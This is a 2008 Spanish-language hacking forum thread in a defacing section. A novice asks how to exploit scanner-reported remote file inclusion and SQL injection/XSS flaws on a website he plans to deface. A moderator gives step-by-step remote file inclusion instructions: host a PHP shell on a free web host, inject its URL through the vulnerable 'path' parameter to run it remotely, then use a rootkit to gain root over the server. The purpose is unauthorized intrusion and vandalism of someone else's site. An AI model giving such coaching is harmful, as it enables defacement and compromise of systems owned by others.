Nuevas NORMAS para el foro
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
¿Perdiste tu
email de activación?
- Agosto 07, 2008, 02:57:11
Boton Buscar
Visita:
Articulos
-
Juegos Gratis
-
Da Foros
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
HacK GeneraL
|
Defacing
| Tema:
Help con la explotacion de estas "Vulnerabilidades"
0 Usuarios y 1 Visitante están viendo este tema.
« anterior
próximo »
Páginas:
[
1
]
Autor
Tema: Help con la explotacion de estas "Vulnerabilidades" (Leído 223 veces)
skullmaster-Back-
Visitante
Help con la explotacion de estas "Vulnerabilidades"
«
en:
Febrero 03, 2008, 05:03:26 »
bueno como estoy comenzando en este de los defacing, pues necesito vuestra ayuda, escanee una pagina web y me dio estas dos vulne.
Linkliste Index.PHP Multiple Remote File Include Vulnerabilities
y
phpMyQuote Index.PHP SQL Injection and Cross-Site Scripting Vulnerabilities
bueno a ver si me podian decir que exploit utilizar o que programa o cosa utilizar!XD igual estare buscando en internet!
espero que me ayuden!
Salu2's!
En línea
The Shadow (Vacaciones)
Moderación
Colaborador
Desconectado
Mensajes: 754
Fucking mnemonic c0d1n6!
Re: Help con la explotacion de estas "Vulnerabilidades"
«
Respuesta #1 en:
Febrero 03, 2008, 07:43:05 »
weno man ... lo primero q te dice :
Cita de: skullmaster123 en Febrero 03, 2008, 05:03:26
Linkliste Index.PHP Multiple Remote File Include Vulnerabilities
pos .... es vulnerable a atakes RFI ... si sabes usar esta tecnica usala .. sino ... busk info en la web
en cuanto a lo segundo :
Cita de: skullmaster123 en Febrero 03, 2008, 05:03:26
phpMyQuote Index.PHP SQL Injection and Cross-Site Scripting Vulnerabilities
te dice q es vulnerable a atakes XSS ... = si sabes la tecnik .. usala ... sino ... busca en la web ..XD
PD: cualquier duda .... postea!
Saludos!
En línea
Reglamento del Foro
Linux Registered User #473016
skullmaster-Back-
Visitante
Re: Help con la explotacion de estas "Vulnerabilidades"
«
Respuesta #2 en:
Febrero 03, 2008, 07:51:40 »
si grax conosco la segunda mas o menos y voy a buskr la de arriba!XD pero una cosa dice:
SQL Injection tambien eso significa que tambien es vulnerable a esta no??
Salu2's!
En línea
ManCuerTex (Vacaciones)
Moderador Global
Gran Colaborador
Desconectado
Mensajes: 1669
Cuando el respeto se pierde... muere la magia
Re: Help con la explotacion de estas "Vulnerabilidades"
«
Respuesta #3 en:
Febrero 04, 2008, 03:10:26 »
Cita de: skullmaster123 en Febrero 03, 2008, 07:51:40
si grax conosco la segunda mas o menos y voy a buskr la de arriba!XD pero una cosa dice:
SQL Injection tambien eso significa que tambien es vulnerable a esta no??
Salu2's!
Si.
La primera es sencilla de realizar, postea los pasos a seguir que haces y pon lo que no consigues.
En esta misma sección tienes manuales de estas 3 técnicas.
Saludos,
En línea
Soñaré Contigo Por Si No Te Veo Mañana...
Hacking Empezando desde 0
Haz Crecer Con Tu Visita La Mini Ciudad de El-Hacker.com!!
Próximamente Reto HacK v.2... (Finalizado!![Revisando code])
skullmaster-Back-
Visitante
Re: Help con la explotacion de estas "Vulnerabilidades"
«
Respuesta #4 en:
Febrero 04, 2008, 11:31:39 »
ok gracias, lei pero no encuentro la manera de hacerlo, lei aja de que se explotaba por ejemplo:
path?=
o algo asi, claro hay mas pero tengo una pregunta, se puede explotar de esta forma, osea si contiene esta manera:
si vamos a inicio me da: index.php
si vamos a otro lugar me da: modules.php?name=Content&pa=showpage&pid=13
y otro: modules.php?name=Downloads
alguna manera o es posible explotar esa vulnerabilidad desde estos puntos? tambien estoy localizando el XSS...........
pero segun tengo entendido y leido la primera es la mas facil, pero se me ha hecho imposible!XD
bueno seguire leyendo e intentando y se me dan su ayuda, pues mejor!
Salu2's!
En línea
ManCuerTex (Vacaciones)
Moderador Global
Gran Colaborador
Desconectado
Mensajes: 1669
Cuando el respeto se pierde... muere la magia
Re: Help con la explotacion de estas "Vulnerabilidades"
«
Respuesta #5 en:
Febrero 04, 2008, 12:14:45 »
A ver te explico.
La vulnerabilidad te dice que está en index.php en la variable path.
Tienes que hacerte con una shell, aquí en esta sección seguro que encuentras muchas shells o alguna recopilación de shells.
Cuando tengas una shell de sistema en php, la guardarás como un archivo .txt y la subes a un hosting gratuito que tengas, tipo lycos o algo parecido, hasta que obtengamos una URL que nos lleve a nuestra shell.
Algo como lycos.es/skullmaster/shell.txt
Entonces abriríamos la página index.php y en la variable path le meteriamos nuestra shell, ya que tiene un fallo de seguridad y nos permite inyectar páginas y código a través de esa variable.
Quedaría algo como:
www.lokesea.com/index.php?path=http://lycos.es/skullmaster123/tushell.txt?
Eso te ejecutará la shell en remoto y podrás realizar cualquier acción de sistema.
Pero seguramente tendrás permisos de usuario, y querrás ser root, pero bueno para defacear esa página, con esos permisos ya podrás.
Si mas adelante te animas a defacear el server entero que seguro que contiene muchas páginas, deberás utilizar algun rootkit para conseguir ser root.
SAludos,
En línea
Soñaré Contigo Por Si No Te Veo Mañana...
Hacking Empezando desde 0
Haz Crecer Con Tu Visita La Mini Ciudad de El-Hacker.com!!
Próximamente Reto HacK v.2... (Finalizado!![Revisando code])
skullmaster-Back-
Visitante
Re: Help con la explotacion de estas "Vulnerabilidades"
«
Respuesta #6 en:
Febrero 04, 2008, 12:18:48 »
grax ya lo de la cuenta lycos lo hice ayer, voy a ver lo de la shell!
Salu2's!
En línea
[p3ll3]
Colaborador
Desconectado
Mensajes: 525
Read The Fucking Manual && STFU xDDD
Re: Help con la explotacion de estas "Vulnerabilidades"
«
Respuesta #7 en:
Febrero 04, 2008, 03:05:45 »
Para lo de remote file inclusion creo que "el Perro" o "Socket" habian dejado un post de como podias hacer un ataque de este tipo voy a ver si lo busco y te dejo el link.
Saludos............
En línea
[[zix]]
Moderación
Gran Colaborador
Desconectado
Mensajes: 2026
¿Quieres saber?, toma tiempo para aprender.
Re: Help con la explotacion de estas "Vulnerabilidades"
«
Respuesta #8 en:
Febrero 04, 2008, 03:08:29 »
Cita de: [p3ll3] en Febrero 04, 2008, 03:05:45
Para lo de remote file inclusion creo que "el Perro" o "Socket" habian dejado un post de como podias hacer un ataque de este tipo voy a ver si lo busco y te dejo el link.
Saludos............
Bueno me tome la molesta de buscarlo sea por ayudar
http://foro.el-hacker.com/index.php/topic,111464.0.html
En línea
Galeria de Diseño de ziX
[p3ll3]
Colaborador
Desconectado
Mensajes: 525
Read The Fucking Manual && STFU xDDD
Re: Help con la explotacion de estas "Vulnerabilidades"
«
Respuesta #9 en:
Febrero 04, 2008, 03:23:43 »
,eso es , esta bien !!!
En línea
Páginas:
[
1
]
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
HacK GeneraL
|
Defacing
| Tema:
Help con la explotacion de estas "Vulnerabilidades"
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Foros De Consulta General
-----------------------------
=> Novedades
=> Dudas, Comentarios Y Sugerencias
=> Top 100
=> Off-Topic
=> Revista E-Zine
===> Noticias
-----------------------------
Phreaking, Hacking y Seguridad
-----------------------------
=> HacK GeneraL
===> Ingenieria Inversa
===> Encriptacion, Cryptografia
===> TV HACK
===> Seguridad
===> Cursos y Ezines
=====> Trucos Internet
=====> Textos Hacking
===> Defacing
=> Phreaking
===> Moviles
=> Bug y Exploits
-----------------------------
Hack Novato
-----------------------------
=> Hack para newbies
=> Todo Messenger
=> Troyanos y virus
-----------------------------
Sistemas Operativos
-----------------------------
=> Windows y otros sistemas operativos no libres
===> Problemas Tecnicos Windows
=> Sistemas operativos libres.
===> GNU/Linux
===> Manuales y Tutoriales
===> Descargas
-----------------------------
Programacion
-----------------------------
=> Programación
===> Programación Basica
===> Otros Lenguajes
===> Visual Basic y Net
===> ASM
===> Programacion Shell
===> Perl
===> Carbide C/C#/C++
===> Batch
===> SQL
=> Programacion para webmasters
===> Consultas
===> Php
===> Html
===> Java - Java Script
===> Php Nuke
===> Scripts Pre-Fabricados
===> Mysql
===> CSS y Diseño Web
-----------------------------
Artes Graficas
-----------------------------
=> Diseño Grafico
===> Battle Arts
===> Flash
===> Tutoriales
===> Galerías
===> Software
-----------------------------
Area Tecnica
-----------------------------
=> Networking & Wireless
=> Overclocking, Refrigeracion y demas
=> Hardware
===> Cursos Y manuales
=> Electronica Y Robotica
-----------------------------
Programas
-----------------------------
=> Software
===> Configuraciones de software
===> Pedidos de software
=> Cracks & Serialz
=> P2p, Bittorrent, Elinks
-----------------------------
Multimedia Y Divx
-----------------------------
=> Juegos PC Y Consolas
===> Dudas ayudas y comentarios de juegos
===> Pedidos de juegos
=> Mp3
=> Multimedia
=> Peliculas Divx
-----------------------------
Entretenimiento Y sitios de interes
-----------------------------
=> Juegos, Humor y Adultos. (Diversión)
===> Adultos
=> Paginas Webs Recomendadas
=> Videos
Powered by SMF 1.1.5
|
SMF © 2006-2007, Simple Machines LLC
Loading...